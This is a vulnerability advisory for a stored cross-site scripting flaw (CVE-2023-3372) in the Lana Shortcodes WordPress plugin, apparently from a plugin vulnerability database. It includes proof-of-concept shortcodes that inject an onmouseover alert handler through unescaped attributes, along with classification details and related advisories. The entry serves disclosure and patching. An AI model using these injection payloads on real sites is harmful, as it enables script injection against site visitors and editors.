Lana Shortcodes < 1.2.0 – Contributor+ Stored XSS | CVE 2023-3372 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Insert any of the following shortcodes in a page/post:

*Button shortcode
[lana_button size="md" type='" onmouseover="alert(1)" style="background:red;"']Lana Button[/lana_button]

*Icon shortcode
[lana_icon name='home" onmouseover="alert(1)" style="background:red;"']

*Label shortcode
[lana_label type='" onmouseover="alert(1)" style="background:red;"']New[/lana_label]

Affects Plugins

lana-shortcodes

Fixed in 1.2.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Webbernaut

Submitter

Webbernaut

Submitter website

https://www.webbernaut.com/

Verified

Yes

WPVDB ID

3396b734-9a10-4070-802d-f9d01cc6eb74

Timeline

Publicly Published

2023-06-26 (about 2 years ago)

Added

2023-06-26 (about 2 years ago)

Last Updated

2023-06-26 (about 2 years ago)

Other

Published

Title

Published

2025-05-18

Title

All in One SEO Pack < 4.8.2 - Contributor+ Stored XSS via Post Meta Description and Canonical URL

Published

2018-12-02

Title

WP Mail SMTP by WPForms < 1.4.0 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2024-02-09

Title

Brooklyn <= 4.9.7.6 - Reflected Cross-Site Scripting

Published

2023-01-19

Title

Themify Portfolio Post < 1.2.2 - Contributor+ Stored XSS

Published

2024-07-11

Title

Admin Dashboard RSS Feed < 3.4 - Administrator+ Stored XSS